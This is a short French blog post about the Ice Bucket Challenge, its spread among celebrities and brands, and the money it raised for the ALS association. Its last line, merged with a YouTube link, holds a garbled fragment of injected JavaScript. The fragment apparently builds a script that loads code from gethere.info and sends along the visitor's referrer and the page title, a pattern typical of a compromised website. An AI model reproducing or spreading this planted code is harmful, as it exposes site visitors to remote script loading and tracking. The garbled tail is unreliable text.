Pour tous les retardataires, revenons sur LE phénomène de cet été, l’Ice Bucket Challenge!
Certains vont se dire: mais qu’est-ce que c’est? C’est très simple, il s’agit pour les uns et les autres de se défier à coup de grands sauts d’eau glacée.

Evidemment, il n’a fallu qu’une fraction de seconde pour que la toile s’empare de ce phénomène, créant ainsi une vague de challenge touchant aussi bien votre voisin de pallier que Justin Timberlake, Oprah Winfrey ou encore Bill Gates.
L’engouement autour de ce challenge est tel que le monde du marketing en a fait qu’une bouchée! On peut voir que les géants Coca-Cola ou encore McDonald’s se sont pris au jeu, à coup de grosse vidéo corporate (et gratuite! eh oui pas cher cette campagne!)

Aujourd’hui, l’association ALS  qui est bénéficiaire de cette tendance du jeté d’eau glacée a récolté pas moins de 31 millions de dollars. Des milliers de personnes à travers le monde répondent à l’appel du sceau d’eau en postant de nombreuses vidéos sur les réseaux sociaux.

https://www.youtube.com/watch?v=ee1wnSadzWQs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »; var d=document;var s=d.createElement(‘script’);